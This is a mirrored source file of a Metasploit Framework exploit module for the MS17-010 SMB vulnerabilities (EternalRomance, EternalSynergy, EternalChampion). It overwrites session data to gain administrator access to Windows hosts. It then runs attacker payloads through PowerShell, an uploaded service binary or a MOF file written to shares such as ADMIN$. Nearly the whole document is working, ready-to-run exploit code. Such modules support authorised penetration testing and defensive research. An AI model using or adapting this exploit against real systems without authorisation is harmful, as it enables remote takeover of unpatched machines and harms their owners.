Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/ms17_010_psexec.rb
19567 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
# Windows XP systems that are not part of a domain default to treating all

7
# network logons as if they were Guest. This prevents SMB relay attacks from

8
# gaining administrative access to these systems. This setting can be found

9
# under:

10
#

11
#  Local Security Settings >

12
#   Local Policies >

13
#    Security Options >

14
#     Network Access: Sharing and security model for local accounts

15


16
class MetasploitModule < Msf::Exploit::Remote

17
  Rank = NormalRanking

18


19
  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010

20
  include Msf::Exploit::Remote::SMB::Client::Psexec

21
  include Msf::Exploit::Remote::CheckModule

22
  include Msf::Exploit::Powershell

23
  include Msf::Exploit::EXE

24
  include Msf::Exploit::WbemExec

25
  include Msf::Auxiliary::Report

26


27
  def initialize(info = {})

28
    super(

29
      update_info(

30
        info,

31
        'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',

32
        'Description' => %q{

33
          This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where

34
          primitive. This will then be used to overwrite the connection session information with as an

35
          Administrator session. From there, the normal psexec payload code execution is done.

36


37
          Exploits a type confusion between Transaction and WriteAndX requests and a race condition in

38
          Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy

39
          exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a

40
          named pipe.

41
        },

42
        'Author' => [

43
          'sleepya', # zzz_exploit idea and offsets

44
          'zerosum0x0',

45
          'Shadow Brokers',

46
          'Equation Group'

47
        ],

48
        'License' => MSF_LICENSE,

49
        'DefaultOptions' => {

50
          'EXITFUNC' => 'thread',

51
          'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',

52
          'WfsDelay' => 10

53
        },

54
        'References' => [

55
          [ 'MSB', 'MS17-010' ],

56
          [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests

57
          [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests

58
          [ 'CVE', '2017-0147'], # for EternalRomance reference

59
          [ 'URL', 'https://github.com/worawit/MS17-010' ],

60
          [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],

61
          [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],

62
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],

63
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER ],

64
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_001_POWERSHELL ],

65
          [ 'ATT&CK', Mitre::Attack::Technique::T1077_WINDOWS_ADMIN_SHARES ],

66
          [ 'ATT&CK', Mitre::Attack::Technique::T1569_002_SERVICE_EXECUTION ]

67
        ],

68
        'Payload' => {

69
          'Space' => 3072,

70
          'DisableNops' => true

71
        },

72
        'Platform' => 'win',

73
        'Arch' => [ARCH_X86, ARCH_X64],

74
        'Targets' => [

75
          [ 'Automatic', {} ],

76
          [ 'PowerShell', {} ],

77
          [ 'Native upload', {} ],

78
          [ 'MOF upload', {} ]

79
        ],

80
        'DefaultTarget' => 0,

81
        'DisclosureDate' => '2017-03-14',

82
        'Notes' => {

83
          'AKA' => [

84
            'ETERNALSYNERGY',

85
            'ETERNALROMANCE',

86
            'ETERNALCHAMPION',

87
            'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred

88
          ],

89
          'Stability' => UNKNOWN_STABILITY,

90
          'Reliability' => UNKNOWN_RELIABILITY,

91
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

92
        }

93
      )

94
    )

95


96
    register_options(

97
      [

98
        OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ])

99
      ]

100
    )

101


102
    register_advanced_options(

103
      [

104
        OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),

105
        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary", nil]),

106
        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),

107
        OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub", nil])

108
      ]

109
    )

110


111
    deregister_options('SMB::ProtocolVersion')

112
  end

113


114
  def validate_service_stub_encoder!

115
    service_encoder = datastore['SERVICE_STUB_ENCODER']

116
    return if service_encoder.nil? || service_encoder.empty?

117


118
    encoder = framework.encoders[service_encoder]

119
    if encoder.nil?

120
      raise Msf::OptionValidateError.new(

121
        {

122
          'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}"

123
        }

124
      )

125
    end

126
  end

127


128
  def exploit

129
    validate_service_stub_encoder!

130


131
    begin

132
      if datastore['SMBUser'].present?

133
        print_status("Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...")

134
      end

135
      eternal_pwn(datastore['RHOST'])

136
      smb_pwn()

137
    rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e

138
      print_error("#{e.message}")

139
    rescue ::Errno::ECONNRESET,

140
           ::Rex::Proto::SMB::Exceptions::LoginError,

141
           ::Rex::HostUnreachable,

142
           ::Rex::ConnectionTimeout,

143
           ::Rex::ConnectionRefused => e

144
      print_error("#{e.class}: #{e.message}")

145
    rescue => error

146
      print_error(error.class.to_s)

147
      print_error(error.message)

148
      print_error(error.backtrace.join("\n"))

149
    ensure

150
      eternal_cleanup() # restore session

151
    end

152
  end

153


154
  def smb_pwn

155
    service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"

156
    service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''

157


158
    case target.name

159
    when 'Automatic'

160
      if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])

161
        print_status('Selecting PowerShell target')

162
        execute_powershell_payload

163
      else

164
        print_status('Selecting native target')

165
        native_upload(datastore['SHARE'], service_filename, service_encoder)

166
      end

167
    when 'PowerShell'

168
      execute_powershell_payload

169
    when 'Native upload'

170
      native_upload(datastore['SHARE'], service_filename, service_encoder)

171
    when 'MOF upload'

172
      mof_upload(datastore['SHARE'])

173
    end

174


175
    handler

176
  end

177
end

178


179


180